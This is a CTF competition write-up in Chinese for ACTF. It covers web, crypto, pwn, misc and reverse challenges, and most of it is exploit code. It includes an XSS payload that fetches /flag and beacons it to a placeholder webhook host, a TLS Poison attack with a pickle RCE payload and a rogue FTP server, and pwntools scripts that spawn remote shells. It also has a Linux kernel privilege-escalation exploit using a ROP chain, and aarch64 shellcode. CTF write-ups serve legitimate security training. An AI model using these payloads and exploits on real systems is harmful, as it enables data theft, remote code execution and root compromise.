文章目录
ACTF
WEB
gogogo
照着p神博客一步一步打就行了
https://www.leavesongs.com/PENETRATION/goahead-en-injection-cve-2021-42342.html
最后反弹shell
beWhatYouWannaBe
flag1: 传url:
javascript:fetch("/flag").then(r=>navigator.sendBeacon('https://WEB_HOOK', r.text()))
直接csrf。
flag2: 用dom clobbering 构造fff.lll.aaaggg.value
<iframe name="fff" srcdoc='
<form id="lll"></form>
<form id="lll" name="aaa">
<input name="ggg" value="this_is_what_i_want" />
</form>'>
</iframe>
tolesion
TLS Poison攻击
通过FTPS协议来进行攻击
https://blog.zeddyu.info/2021/04/20/tls-poison/
用域名和证书起一个恶意的FTPs服务,让目标来请求,然后通过ftp的被动模式把payload转发到11200端口,写入pickle反序列化payload来进行rce
import socketserver, threading, requests, subprocess,time, base64, secrets,sys, hashlib, os
import redis, secrets, re
import pickle
class People(object):
def __reduce__(self):
cmd = f"/bin/bash -c 'touch /tmp/sussess'"
cmds = f"cmd.exe /c calc.exe"
# __reduce__ returns a tuple of callable and tuple of arguments of the callable
return os.system, (cmd,)
a = People()
c = base64.b64encode(pickle.dumps(a))
f = open("/home/ubuntu/2.txt",'rb')
print(c)
b = base64.b64decode(c)
print(b)
le = str(len(b))
print(le)
r = redis.Redis(host='127.0.0.1', port=6379, db=0)
cmd = b';/r*'
payload = b"\r\n\r\nset actfSession:b1e891e5-a183-4738-852c-237aca54671b "+ b"0 0 "+le.encode()+b" \r\n"+b+b"\r\n"
#payload = b"\r\n\r\nset actfSession:testesttest 0 0 2\r\nOK\r\n"
payload = b"\r\n\r\n"+f.read()
print('payload len: ', payload, file=sys.stderr)
r.set('payload', payload)
#!/usr/bin/env python3
import socketserver, threading,sys
class MyTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
print('[+] connected', self.request, file=sys.stderr)
self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr,flush=True)
self.request.sendall(b'230 Login successful.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 yolo\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 yolo\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'257 "/" is the current directory\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,192)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,192)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 Switching to Binary mode.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
# 226 Transfer complete.
self.request.sendall(b'250 Requested file action okay, completed.')
exit()
def ftp_worker():
with socketserver.TCPServer(('0.0.0.0', 2048), MyTCPHandler) as server:
while True:
server.handle_request()
threading.Thread(target=ftp_worker).start()
Crypto
RSA LEAK
from Crypto.Util.number import *
import random
from gmpy2 import next_prime, iroot
# n = 122146249659110799196678177080657779971
# l = 90846368443479079691227824315092288065
# l = (l - 0xdeadbeef) % n
# dic = []
# for i in range(1, 1 << 24):
# dic.append(pow(i, 65537, n))
# dic = set(dic)
# print('OK')
# for i in range(1, 1 << 24):
# tmp = (l - pow(i, 65537, n)) % n
# try:
# if tmp in dic:
# print(i, tmp)
# except:
# continue
n = 3183573836769699313763043722513486503160533089470716348487649113450828830224151824106050562868640291712433283679799855890306945562430572137128269318944453041825476154913676849658599642113896525291798525533722805116041675462675732995881671359593602584751304602244415149859346875340361740775463623467503186824385780851920136368593725535779854726168687179051303851797111239451264183276544616736820298054063232641359775128753071340474714720534858295660426278356630743758247422916519687362426114443660989774519751234591819547129288719863041972824405872212208118093577184659446552017086531002340663509215501866212294702743
e = 65537
c = 48433948078708266558408900822131846839473472350405274958254566291017137879542806238459456400958349315245447486509633749276746053786868315163583443030289607980449076267295483248068122553237802668045588106193692102901936355277693449867608379899254200590252441986645643511838233803828204450622023993363140246583650322952060860867801081687288233255776380790653361695125971596448862744165007007840033270102756536056501059098523990991260352123691349393725158028931174218091973919457078350257978338294099849690514328273829474324145569140386584429042884336459789499705672633475010234403132893629856284982320249119974872840
rp = 405771
rq = 11974933
t = iroot(n, 4)[0]
x = (-pow(t, 4) - rp * rq + n + iroot(pow(-pow(t, 4) - rp * rq + n, 2) - 4 * rp * rq * pow(t, 4), 2)[0]) // (2 * rq)
print(n % (x + rp))
p = x + rp
q = n // p
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
impossible RSA
from Crypto.Util.number import *
from gmpy2 import iroot
n = 15987576139341888788648863000534417640300610310400667285095951525208145689364599119023071414036901060746667790322978452082156680245315967027826237720608915093109552001033660867808508307569531484090109429319369422352192782126107818889717133951923616077943884651989622345435505428708807799081267551724239052569147921746342232280621533501263115148844736900422712305937266228809533549134349607212400851092005281865296850991469375578815615235030857047620950536534729591359236290249610371406300791107442098796128895918697534590865459421439398361818591924211607651747970679849262467894774012617335352887745475509155575074809
e = 65537
for i in range(1, 65537):
if iroot(1 + 4 * i * e * n, 2)[1]:
if n % ((iroot(1 + 4 * i * e * n, 2)[0] - 1) // (2 * i)) == 0:
p = (iroot(1 + 4 * i * e * n, 2)[0] - 1) // (2 * i)
print(p)
q = inverse(e, p)
print(p * q == n)
flag = open('flag', 'rb').read()
flag = bytes_to_long(flag)
d = inverse(e, (p - 1) * (q - 1))
print(long_to_bytes(pow(flag, d, n)))
Pwn
mykvm
from pwn import*
context(os="linux",arch="amd64",log_level='debug')
libc=ELF("./libc-2.23.so")
while (True):
flag=0
r=remote("20.247.110.192",10888)
#r=remote("127.0.0.1",6666)
#r=process('./main')
code=asm("""
.code16
mov bx,0x8
mov ax,0x3F
mov ds,ax
mov ax,0x710
mov ss,ax
lable:
mov al,byte ptr ds:[bx]
out 0,al
add bx,1
cmp bx,0x200
jna lable
xor bx,bx
mov al,0x0B
mov ss:[bx+0x0],al
mov al,0x20
mov ss:[bx+0x1],al
mov al,0x60
mov ss:[bx+0x2],al
mov al,0
mov ss:[bx+0x3],al
hlt
""")
r.recvuntil(": \n")
r.sendline(str(0x1000))
r.recvuntil(": \n")
r.send(code)
r.recvuntil(": ")
r.sendline("a"*0x8)
r.recvuntil(": ")
r.sendline("b"*0x8)
r.recvuntil("b"*0x8+"\n")
sleep(0.1)
libc_base=u64(r.recv(8))-0x8309d8
success("libc_base: "+hex(libc_base))
one_gadget=libc_base+0xf1247
#gdb.attach(r,"b *0x400E49")
test=one_gadget
for i in range (3):
char=test%0x100
if (char>0x7e or char<0x20 ):
flag=1
break
test=test//0x100
if (flag==1):
r.close()
continue;
else:
pause()
r.recvuntil("host name: ")
r.sendline("a"*0x1D+p32(one_gadget%0x1000000)[:-1])
r.interactive()
kkk
#include <stdio.h>
#include <fcntl.h>
#include <poll.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
#include <syscall.h>
#include <pthread.h>
#include <sys/shm.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <openssl/aes.h>
#include <openssl/evp.h>
#include <openssl/bio.h>
#include <openssl/buffer.h>
#include <openssl/md5.h>
struct request
{
union
{
uint64_t idx;
uint64_t type;
};
uint64_t key_size;
char *key;
uint64_t content_size;
char *content;
};
int dev_fd;
char *recv_key;
uint64_t user_cs,user_ss,user_eflag,rsp;
void save_state()
{
asm(
"movq %%cs, %0;"
"movq %%ss, %1;"
"movq %%rsp, %3;"
"pushfq;"
"pop %2;"
: "=r"(user_cs),"=r"(user_ss),"=r"(user_eflag),"=r"(rsp)
:
: "memory"
);
}
void err(char *error)
{
puts(error);
exit(-1);
}
void new(uint64_t type, uint64_t key_size, char *key, uint64_t content_size, char *content)
{
struct request request_t;
int ret;
memset(&request_t, 0, sizeof(struct request));
request_t.type = type;
request_t.key_size = key_size;
request_t.key = key;
request_t.content_size = content_size;
request_t.content = content;
ret = ioctl(dev_fd, 0x6B64, &request_t);
if (ret) err("Error While New");
}
void edit(uint64_t idx, char *key, char *content)
{
struct request request_t;
int ret;
memset(&request_t, 0, sizeof(struct request));
request_t.idx = idx;
request_t.key = key;
request_t.content = content;
ret = ioctl(dev_fd, 0x6B67, &request_t);
if (ret) err("Error While Edit");
}
void show(uint64_t idx, char *key, char *content)
{
struct request request_t;
int ret;
memset(&request_t, 0, sizeof(struct request));
request_t.idx = idx;
request_t.key = key;
request_t.content = content;
ret = ioctl(dev_fd, 0x6B69, &request_t);
if (ret) err("Error While Show");
}
void encrypto(uint64_t idx)
{
struct request request_t;
int ret;
memset(&request_t, 0, sizeof(struct request));
request_t.idx = idx;
ret = ioctl(dev_fd, 0x6B6B, &request_t);
if (ret) err("Error While Encrypto");
}
void delete(uint64_t idx)
{
struct request request_t;
int ret;
memset(&request_t, 0, sizeof(struct request));
request_t.idx = idx;
ret = ioctl(dev_fd, 0x6B6D, &request_t);
if (ret) err("Error While Delete");
}
void arbitrary_write(uint64_t addr, uint64_t content)
{
uint64_t *eval = malloc(0x8);
char *zero_page = malloc(0x400);
((uint64_t *)recv_key)[0x7a] = 0x8;
((uint64_t *)recv_key)[0x7b] = addr;
edit(1, recv_key, zero_page);
eval[0] = content;
edit(2, (char *)eval, zero_page);
show(1, recv_key, zero_page);
free(eval);
free(zero_page);
}
uint64_t arbitrary_read(uint64_t addr)
{
char *zero_page = malloc(0x400);
((uint64_t *)recv_key)[0x7a] = 0x8;
((uint64_t *)recv_key)[0x7b] = addr;
edit(1, recv_key, zero_page);
uint64_t eval;
show(2, (char *)&eval, zero_page);
show(1, recv_key, zero_page);
free(zero_page);
return eval;
}
void get_shell()
{
char buf[0x50];
memset(buf, 0, 0x20);
int fd = open("/flag", O_RDONLY);
read(fd, buf, 0x20);
puts(buf);
_exit(0);
}
int main()
{
save_state();
dev_fd = open("/dev/kkk", O_RDWR);
if (dev_fd <= 0) perror("Error While Open");
char *key = malloc(0x1000); char *content = malloc(0x1000);
char *recv_content = malloc(0x1000);
recv_key = mmap((void *)0xA000000, 0x3000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
recv_key[0]='a';
memset(key, 0, 0x1000);
memset(content, 0, 0x1000);
((uint64_t *)content)[0] = 0x8b3207c19fd5207;
((uint64_t *)(content+0x3a0))[0] = 0x8b3207c19fd5207;
((uint64_t *)content)[0x1] = 0x28;
((uint64_t *)key)[0] = 0x17d9e6b8154f6c42;
((uint64_t *)key)[1] = 0x7e4dcabfe6696471;
((uint64_t *)key)[2] = 0x69dc751b40f32c5a;
((uint64_t *)key)[3] = 0x82e6efe9e0db73b0;
new(3, 0x28, key, 0x3a8, content);
new(3, 0x28, key, 0x3a8, content);
new(3, 0x28, key, 0x3a8, content);
new(3, 0x28, key, 0x3a8, content);
encrypto(0);
show(1, recv_key, recv_content);
uint64_t heap_addr = ((uint64_t *)recv_key)[0x7b] - 0x30;
uint64_t modprobe_base = ((uint64_t *)recv_key)[0x7f] - 0x130;
printf("[+] heap_addr: 0x%lx\n", heap_addr);
printf("[+] modprobe_base: 0x%lx\n", modprobe_base);
((uint64_t *)recv_key)[0x7b] = modprobe_base + 0x1188;
edit(1, recv_key, content);
show(2, recv_key, recv_content);
uint64_t kernel_base = ((uint64_t *)recv_key)[0] - 0x2258e0;
uint64_t modprobe_path = kernel_base + 0x1850fa0;
uint64_t work_for_cpu_fn = kernel_base + 0x8de20;
uint64_t commit_creds = kernel_base + 0x9bcf0;
uint64_t prepare_kernel_cred = kernel_base + 0x9bf90;
uint64_t poweroff_cmd = kernel_base + 0x18507e0;
uint64_t poweroff_work_func = kernel_base + 0x9ce40;
uint64_t set_rsp = kernel_base + 0x524e89;
uint64_t init_task = kernel_base + 0x1814940;
uint64_t pop_rdi = kernel_base + 0x1614;
uint64_t pop4 = kernel_base + 0x18adb;
uint64_t kpti_trampoline = kernel_base+ 0xe00e10;
uint64_t swapgs = kernel_base + 0xc67240;
uint64_t iretq = kernel_base + 0x2ae1b;
printf("[+] kernel_base: 0x%lx\n", kernel_base);
printf("[+] modprobe_path: 0x%lx\n", modprobe_path);
printf("[+] work_for_cpu_fn: 0x%lx\n", work_for_cpu_fn);
printf("[+] commit_creds: 0x%lx\n", commit_creds);
printf("[+] prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
printf("[+] poweroff_cmd: 0x%lx\n", poweroff_cmd);
printf("[+] kpti_trampoline: 0x%lx\n", kpti_trampoline + 22);
printf("[+] poweroff_work_func: 0x%lx\n", poweroff_work_func);
printf("[+] init_task: 0x%lx\n", init_task);
arbitrary_write(heap_addr - 0x400, 0x800);
arbitrary_write(heap_addr + 0x420, set_rsp);
arbitrary_write(heap_addr + 0x428, work_for_cpu_fn);
uint64_t *eval = malloc(0x100);
char *zero_page = malloc(0x400);
((uint64_t *)recv_key)[0x7a] = 0x100;
((uint64_t *)recv_key)[0x7b] = heap_addr + 0x408;
edit(1, recv_key, zero_page);
memset(eval, 0x61, 0x100);
eval[0] = pop4;
eval[3] = set_rsp;
eval[4] = work_for_cpu_fn;
eval[5] = pop_rdi;
eval[6] = 0;
eval[7] = prepare_kernel_cred;
eval[8] = commit_creds;
eval[9] = kpti_trampoline + 22;
eval[10] = 0;
eval[11] = 0;
eval[12] = (uint64_t)get_shell;
eval[13] = user_cs;
eval[14] = user_eflag;
eval[15] = rsp;
eval[16] = user_ss;
edit(2, (char *)eval, zero_page);
show(1, recv_key, zero_page);
free(eval);
free(zero_page);
encrypto(3);
}
2048
from pwn import *
import os
context(os = "linux", arch = "aarch64", log_level = "debug")
#io = process("qemu-aarch64 -L ./ ./pwn", shell = True)
io = remote("124.70.166.38", "9999")
io.recvuntil("`")
cmd = io.recvuntil("`")[:-1]
os.system(cmd)
io.send(raw_input())
shellcode = asm('''
add x0, x30, #20
mov x1, xzr
mov x2, xzr
mov x8, #221
svc 0
.ascii "/bin/sh\\0"
''')
io.sendafter("Input your name: \n", b"winmt")
io.send("asasasasasasassasasasasasasaasasasasasasassasasasasasasadadasaasasassadsassssassadsasassassdasdadadadssasasaaadsaasasdsasdsaasdadassasasdssdsasasaaadassdsaasaadsaasssasdsaassassdsasassadsasdsasasdsssdsassassaasasdasasasadsaaadasadssssasadsasasaasasdsaassaasaaasasaaaaaaadasssdaasaaaadsasdsssadsssasadsaadsaadsdsasadassaasdssadsaasasasaasasadadsasasaassaasadsasaasasadsasadasaasasasasaadadadsasdssasdsdsssdsdaaasdsdsddssasassssdasssassaadasasasadasasassdsasssasssasssssdsssssssasadssdsdsasdsassaasaassddsaasasasasssdsassasdaassdassdssaasasssdsdssadassdassdasasadadasasdasdsasaadasdsassasdsadadssasdssssdassdsdsadsssassasssdsasassaassdsasdsadssasssdsaassadsasaasdssasdsssasasdsdsdsdaddsddddddasdssasssdasdsssadasasassaaasaaaassasaadssdsdsddadsdsaasdassasasdadsasddsasasdsddsssasdsdsdsssdsasassdsdssdsdsdsdsdddadsdasdsdsdsdsssdssdsddsdadadsdssddsdadasdssdddsasssdadssadssssdadsdssdssdsddssddsdsasdsdasdsasddsdssddsdasddsasassddsdsdsaasddsadsdssdsassasassdsdassasddssssadsdsdssddsdddddadsdsdsaaa")
gadget1_addr = 0x4020D8
gadget2_addr = 0x4020B8
shellcode_addr = 0x413070
read_got_addr = 0x412F98
payload = b'a'*0x28 + p64(gadget1_addr) + p64(0) + p64(gadget2_addr) + p64(0) + p64(1) + p64(read_got_addr) + p64(0) + p64(shellcode_addr) + p64(0x50) + p64(0) + p64(shellcode_addr) # ret2csu
io.sendafter("Do you want to continue playing? [y/n]: ", payload)
sleep(0.1)
io.send(shellcode)
io.interactive()
Misc
Mahjoong
因为是打麻将所以猜测胡了就可以有flag,于是找到这一串
写个脚本异或一下a和b就是flag
ACTF{y@kumAn_1s_incredl3le}
signin
下载下来是一个不知道啥玩意的flag文件,file命令看一下发现是bzip2,于是使用bzip2 -d 去解压,里面又是一个xz文件。这样手动解包最后发现有五种压缩形式
bzip2
gzip
xz
lzma
zstd
于是写爆破脚本去爆破压缩类型并解压缩
import os
os.rename('flag','flag.gz')
os.system('gzip -d flag.gz')
os.rename('flag.gz','flag.bz')
os.system('bzip2 -d flag.bz')
os.rename('flag.bz','flag.xz')
os.system('xz -d flag.xz')
os.rename('flag.xz','flag.zstd')
os.system('zstd -d flag.zstd')
os.rename('flag.zstd','flag.lzma')
os.system('lzma -d flag.lzma')
最后写个循环一直解就可以拿到flag
ACTF{r0cK_4Nd_rolL_1n_C0mpr33s1ng_aNd_uNCOmrEs5iNg}
signoff
问卷
Reverse
dropper
C++实现的大整数运算,从内存中拿出结果,然后用户z3解
from z3 import *
arr = [64584540291872516627894939590684951703479643371381420434698676192916126802789388,11783410410469738048283152171898507679537812634841032055361622989575562121323526, 55440851777679184418972581091796582321001517732868509947716453414109025036506793, 17867047589171477574847737912328753108849304549280205992204587760361310317983607, 7537302706582391238853817483600228733479333152488218477840149847189049516952787, 80793226935699295824618519685638809874579343342564712419235587177713165502121664, 14385283226689171523445844388769467232023411467394422980403729848631619308579599, 55079029772840138145785005601340325789675668817561045403173659223377346727295749, 71119332457202863671922045224905384620742912949065190274173724688764272313900465, 57705573952449699620072104055030025886984180500734382250587152417040141679598894]
res = 834572051814337070469744559761199605121805728622619480039894407167152612470842477813941120780374570205930952883661000998715107231695919001238818879944773516507366865633886966330912156402063735306303966193481658066437563587241718036562480496368592194719092339868512773222711600878782903109949779245500098606570248830570792028831133949440164219842871034275938433
s = Solver()
flag = BitVec('flag', 700)
my = ((((((((flag+arr[0])*arr[1]-arr[2])+arr[3])*arr[4])-arr[5])+arr[6])-arr[7])+arr[8])-arr[9]
s.add(my==res)
if s.check() ==sat:
out = s.model()[flag].as_long()
print(out)
解出来的结果转成二进制,7个字节为一组转换成字符就得到base64
import base64
out = 9396732749587903779982032223783704408363403648379534949744333952324860296757610447170361685759182747971458838316594664099958866750753425972637962724687099230310084662432348188439040968731452657169050321
out = '0' + bin(out)[2:]
flag = b""
for i in range(len(out), 0, -7):
flag += int(out[i-7:i],2).to_bytes(1,'big')
print(base64.b64decode(flag))
b'ACTF{dr0pp3r_1s_v3ry_int3r3st1ng_1d7a90a63039831c7fcaa53b766d5b2d!!!!!}'
最新评论